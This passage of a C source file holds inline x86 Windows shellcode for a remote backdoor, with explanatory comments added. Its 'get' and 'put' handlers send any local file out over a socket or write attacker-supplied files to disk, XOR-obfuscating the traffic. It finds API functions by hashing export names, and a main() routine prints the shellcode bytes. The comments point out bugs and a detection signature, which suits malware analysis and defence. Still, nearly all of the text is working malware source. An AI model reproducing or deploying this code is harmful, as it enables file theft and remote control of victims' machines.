- ;-----------------------------------------------------------------------
- ; get_file — handle a "get <filename>" command: open the named local file
- ; and fall through into `transfer`, which streams it back over the socket.
- ; Register conventions used throughout this listing:
- ;   esi = base of the shellcode's data area (_sbuf, _pbuf, _cnt, _hout0,
- ;         _hsck and the imported API slots are all esi-relative offsets)
- ;   eax = length of the received command text in _sbuf (set by the caller,
- ;         outside this view — confirm)
- ; The filename is taken verbatim from the remotely supplied command text;
- ; nothing here validates or restricts the path.
- ; Exits: falls through to transfer on success; jumps to k1 (outside this
- ; view) when CreateFileA returns INVALID_HANDLE_VALUE.
- ;-----------------------------------------------------------------------
- get_file:
- //int 3                                   ; debugger breakpoint, left disabled
- mov byte ptr [esi+_sbuf+eax-1], 0         ; NUL-terminate: overwrite the last command byte (presumably a trailing newline — confirm)
- lea edx, [esi+_sbuf+4] ; edx = &_sbuf[4], the filename following "get "
- xor eax, eax                              ; eax = 0 for the NULL/zero arguments below
- ; CreateFileA arguments, pushed right to left (stdcall)
- push eax                                  ; hTemplateFile = NULL
- push eax                                  ; dwFlagsAndAttributes = 0
- push 3 ; dwCreationDisposition = OPEN_EXISTING
- push eax ; lpSecurityAttributes = NULL
- push eax                                  ; dwShareMode = 0 (no sharing)
- push 0x02000000 ; dwDesiredAccess = MAXIMUM_ALLOWED
- push edx ; lpFileName = filename
- call dword ptr [esi+_CreateFileA]         ; eax = file handle, or INVALID_HANDLE_VALUE (-1)
- //---- check whether the file open succeeded -------
- inc eax                                   ; INVALID_HANDLE_VALUE (-1) + 1 == 0
- test eax, eax
- jz k1                                     ; open failed: abandon the command (k1 is outside this view)
- dec eax                                   ; restore the real handle value
- //---------------------------------
- mov [esi+_hout0], eax                     ; _hout0 = file handle; execution falls through into transfer
-
- ;-----------------------------------------------------------------------
- ; transfer — read the open file _hout0 in 0x40-byte chunks, XOR-encode
- ; each chunk with Xor_key and send it on the socket _hsck, until ReadFile
- ; reports 0 bytes in _cnt. Entered by fall-through from get_file.
- ; Neither ReadFile's nor send's return value (eax) is checked: only
- ; _cnt == 0 ends the loop, so a read error leaves whatever _cnt held and
- ; may resend stale buffer contents. On exit the handle is closed and
- ; control jumps to k1 (outside this view).
- ;-----------------------------------------------------------------------
- transfer:
- ; ReadFile(_hout0, _pbuf, 0x40, &_cnt, NULL) — arguments pushed right to left
- push 0 ; lpOverlapped = NULL
- lea edx, [esi+_cnt]
- push edx ; lpNumberOfBytesRead = &_cnt (bytes actually read)
- push 0x40 ; nNumberOfBytesToRead = 64, the chunk size
- lea edx, [esi+_pbuf]
- push edx                                  ; lpBuffer = _pbuf
- push [esi+_hout0]                         ; hFile
- call dword ptr [esi+_ReadFile]            ; return value in eax is not checked
- mov ecx, [esi+_cnt]                       ; ecx = bytes read this round
- jecxz transfer_finish ; 0 bytes read: end of file (or an error that left _cnt at 0)
-
- lea edx, [esi+_pbuf]                      ; edx = buffer, ecx = length, for xor_data
- call xor_data                             ; XOR ecx bytes in place with Xor_key; clobbers ecx (→0) and edx
- ; send(_hsck, _pbuf, _cnt, 0) — _cnt is re-read from memory because xor_data zeroed ecx
- push 0                                    ; flags = 0
- push [esi+_cnt]                           ; len = bytes read
- lea edx, [esi+_pbuf]
- push edx                                  ; buf = _pbuf
- push [esi+_hsck]                          ; s = the connected socket
- call dword ptr [esi+_send]                ; return value in eax is not checked
- jmp transfer                              ; next chunk
- transfer_finish:
- push [esi+_hout0]
- call dword ptr [esi+_CloseHandle]         ; CloseHandle(_hout0)
- jmp k1                                    ; k1 is outside this view (presumably the command loop — confirm)
- ;-----------------------------------------------------------------------
- ; put_file — handle a "put <filename>" command: create (or truncate) the
- ; named local file and fall through into `upload`, which fills it from the
- ; socket. Same register conventions as get_file (esi = data base, eax =
- ; command length on entry). The path comes verbatim from the remote command.
- ; Unlike get_file, the INVALID_HANDLE_VALUE check is commented out, so a
- ; failed CreateFileA stores -1 in _hout0 and every WriteFile in upload then
- ; fails silently while the incoming data is still consumed from the socket.
- ;-----------------------------------------------------------------------
- put_file:
- //int 3                                   ; debugger breakpoint, left disabled
- mov byte ptr [esi+_sbuf+eax-1], 0         ; NUL-terminate the command text at _sbuf[eax-1]
- lea edx, [esi+_sbuf+4] ; edx = &_sbuf[4], the filename following "put "
- xor eax, eax                              ; eax = 0 for the NULL/zero arguments below
- ; CreateFileA arguments, pushed right to left (stdcall)
- push eax                                  ; hTemplateFile = NULL
- push eax                                  ; dwFlagsAndAttributes = 0
- push 2 ; dwCreationDisposition = CREATE_ALWAYS (overwrites an existing file)
- push eax ; lpSecurityAttributes = NULL
- push eax                                  ; dwShareMode = 0
- push 0x02000000 ; dwDesiredAccess = MAXIMUM_ALLOWED
- push edx ; lpFileName = filename
- call dword ptr [esi+_CreateFileA]         ; eax = file handle, or INVALID_HANDLE_VALUE (-1)
- //---- check whether the file creation succeeded (disabled) -------
- //inc eax
- //test eax, eax
- //jz k1
- //dec eax
- //--------------------------------
- mov [esi+_hout0], eax                     ; stored unchecked; execution falls through into upload
- ;-----------------------------------------------------------------------
- ; upload — receive the file body for put_file: loop recv() on _hsck in
- ; 0x40-byte chunks, XOR-decode each chunk with Xor_key and WriteFile it
- ; to _hout0 until a chunk begins with the literal "END!". Entered by
- ; fall-through from put_file.
- ; Observations on the loop as written:
- ;  * recv's return value (eax) becomes the chunk length without being
- ;    checked: 0 (peer closed) or SOCKET_ERROR (-1) is handed to xor_data,
- ;    whose `loop` then iterates ~2^32 times and writes far past _pbuf.
- ;  * The "END!" test looks only at the first 4 bytes of each chunk, so a
- ;    data chunk that happens to start with "END!" ends the upload early,
- ;    and a chunk shorter than 4 bytes compares stale buffer bytes.
- ;  * WriteFile's return value is never examined; write errors are silent.
- ;-----------------------------------------------------------------------
- upload:
- ; recv(_hsck, _pbuf, 0x40, 0) — arguments pushed right to left
- push 0                                    ; flags = 0
- push 0x40                                 ; len = 64, the chunk size
- lea edx, [esi+_pbuf]
- push edx                                  ; buf = _pbuf
- push [esi+_hsck]                          ; s = the connected socket
- call dword ptr [esi+_recv] // recv(_hsck, _pbuf, 64, 0); eax = bytes received (unchecked)
- //-----------------------------
- cmp dword ptr [esi+_pbuf], 21444E45h // terminator check: 0x21444E45 is "END!" read as a little-endian dword
- jz upload_finish
- //-----------------------------
- lea edx, [esi+_pbuf]                      ; edx = buffer for xor_data
- push eax
- pop ecx                                   ; ecx = eax, the recv length
- call xor_data // xor_data(_pbuf, len); clobbers ecx and edx, eax survives
- ; WriteFile(_hout0, _pbuf, eax, &_cnt, NULL) — arguments pushed right to left
- push 0                                    ; lpOverlapped = NULL
- lea edx, [esi+_cnt]
- push edx                                  ; lpNumberOfBytesWritten = &_cnt
- push eax                                  ; nNumberOfBytesToWrite = recv length
- lea edx, [esi+_pbuf]
- push edx                                  ; lpBuffer = _pbuf
- push [esi+_hout0]                         ; hFile (may be INVALID_HANDLE_VALUE, see put_file)
- call dword ptr [esi+_WriteFile] // WriteFile(_hout0, _pbuf, len, _cnt, 0); return value not checked
- ; Disabled alternative end-of-data test: ioctlsocket(_hsck, FIONREAD, &i)
- ; and stop when no bytes are pending (0x4004667F is FIONREAD).
- //push 0
- //push esp
- //push 4004667Fh
- //push [esi+_hsck]
- //call dword ptr [esi+_ioctlsocket] // ioctlsocket(_hsck, FIONREAD, &i); i = 0
- //pop ecx
- //jecxz upload_finish
-
- jmp upload                                ; next chunk
-
- upload_finish:
- //int 3                                   ; debugger breakpoint, left disabled
- push [esi+_hout0]
- call dword ptr [esi+_CloseHandle] // CloseHandle(_hout0);
- mov byte ptr [esi+_sbuf], 0x0a            ; _sbuf[0] = '\n'; its consumer is past `restore`, outside this view
- push 1
- pop eax                                   ; eax = 1 (shellcode idiom: avoids the zero bytes of mov eax, 1)
- jmp restore                               ; restore is outside this view
- ;-----------------------------------------------------------------------
- ; xor_data — XOR ecx bytes at [edx] in place with the constant Xor_key
- ; (defined elsewhere in the file). Used symmetrically to encode outgoing
- ; chunks (transfer) and decode incoming ones (upload). A single-byte XOR
- ; is obfuscation, not encryption: the key follows from any known plaintext.
- ; In:    edx = buffer, ecx = byte count (must be > 0)
- ; Out:   buffer modified in place; ecx = 0 and edx = edx - 1 (both clobbered); flags clobbered
- ; Note:  `loop` decrements before testing, so ecx == 0 on entry iterates
- ;        2^32 times and writes far outside the buffer.
- ;-----------------------------------------------------------------------
- xor_data:
- dec edx                                   ; bias the base so [edx+ecx] walks buffer[ecx-1] down to buffer[0]
- xor_work:
- xor byte ptr [edx+ecx], Xor_key           ; buffer[ecx-1] ^= Xor_key
- loop xor_work                             ; ecx--, repeat while ecx != 0
- ret
- ;-----------------------------------------------------------------------
- ; find_hashfunc_addr — resolve one exported function of a loaded module by
- ; a 32-bit hash of its name, walking the PE32 export directory by hand.
- ; In:    ebp = module base address (the image base of the DLL searched)
- ;        edi = pointer to the wanted hash; the resolved address is stored
- ;              back through edi and edi advances by 4 (stosd)
- ; Out:   [edi-4] = function VA; eax = function VA
- ; Preserved: esi, ecx (pushed/popped). Clobbered: eax, ebx, edx, edi (+4), flags
- ; Hash:  ebx = 0; for each name byte c until NUL: ebx = ror(ebx, 7) + c
- ;        (c sign-extended). This ROR-7/ADD loop is a common shellcode
- ;        API-resolution pattern and a useful static-detection signature.
- ; Caveat: there is no bound against NumberOfNames, so an unmatched hash
- ;        keeps reading past the end of the AddressOfNames table.
- ;-----------------------------------------------------------------------
- find_hashfunc_addr:
- push ecx                                  ; preserved for the caller
- push esi                                  ; preserved for the caller
- mov esi, [ebp+3Ch] ; e_lfanew: offset of the PE header from the DOS header
- mov esi, [esi+ebp+78h] ; ExportDirectory RVA (PE32 DataDirectory[0].VirtualAddress)
- add esi, ebp ; rva2va: esi = &IMAGE_EXPORT_DIRECTORY
- push esi                                  ; kept for the ordinal/function lookups below
- mov esi, [esi+20h] ; AddressOfNames RVA
- add esi, ebp ; rva2va: esi = name-pointer table
- xor ecx, ecx
- dec ecx                                   ; ecx = -1, pre-decremented name index
-
- find_start:
- inc ecx                                   ; next name index
- lodsd                                     ; eax = RVA of name[ecx], esi += 4
- add eax, ebp                              ; eax = &name[ecx] (VA)
- xor ebx, ebx                              ; ebx = running hash
-
- hash_loop:
- movsx edx, byte ptr [eax]                 ; dl = current char, dh = its sign extension (0 for ASCII)
- cmp dl, dh                                ; NUL terminator? (dl == dh, i.e. dl == 0 for ASCII input)
- jz short find_addr
- ror ebx, 7 ; hash = ror(hash, 7) + c
- add ebx, edx
- inc eax                                   ; next char
- jmp short hash_loop
-
- find_addr:
- cmp ebx, [edi] ; compare the computed hash with the wanted one
- jnz short find_start                      ; no match: try the next exported name
- pop esi ; esi = ExportDirectory
- mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA
- add ebx, ebp ; rva2va
- mov cx, [ebx+ecx*2] ; cx = ordinal for name index ecx (16-bit entries; the upper half of ecx keeps the index's upper bits, 0 for any index < 65536)
- mov ebx, [esi+1Ch] ; AddressOfFunctions RVA
- add ebx, ebp ; rva2va
- mov eax, [ebx+ecx*4] ; FunctionAddress RVA, indexed by ordinal
- add eax, ebp ; rva2va
- stosd ; store the function address at [edi], edi += 4
- pop esi                                   ; restore the caller's esi
- pop ecx                                   ; restore the caller's ecx
- retn
- ;-----------------------------------------------------------------------
- ; locate_addr — tail of the shellcode body. `call func_start` pushes the
- ; address of the byte following the call, i.e. whatever PROC_END closes
- ; the procedure with; func_start (outside this view) presumably pops it
- ; to obtain the esi data base used throughout — confirm against func_start.
- ;-----------------------------------------------------------------------
- locate_addr:
- call func_start                           ; get-PC idiom: pushes the address of what follows; func_start is outside this view
- PROC_END //C macro to end proc
- }
- }
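- /*
-  * Host-side entry point: runs GetShellCode() and then PrintSc(sh_Buff,
-  * sh_Len), both defined elsewhere in this file, to emit the sh_Len bytes
-  * at sh_Buff. argc/argv are unused. The unused 2 KiB local buffer of the
-  * original (and the dead call that referenced it) is dropped.
-  * Returns 1, as the original did (note: nonzero is conventionally failure).
-  */
- int main(int argc, char *argv[])
- {
- (void)argc;
- (void)argv;
- GetShellCode();
- PrintSc(sh_Buff, sh_Len);
- return 1;
- }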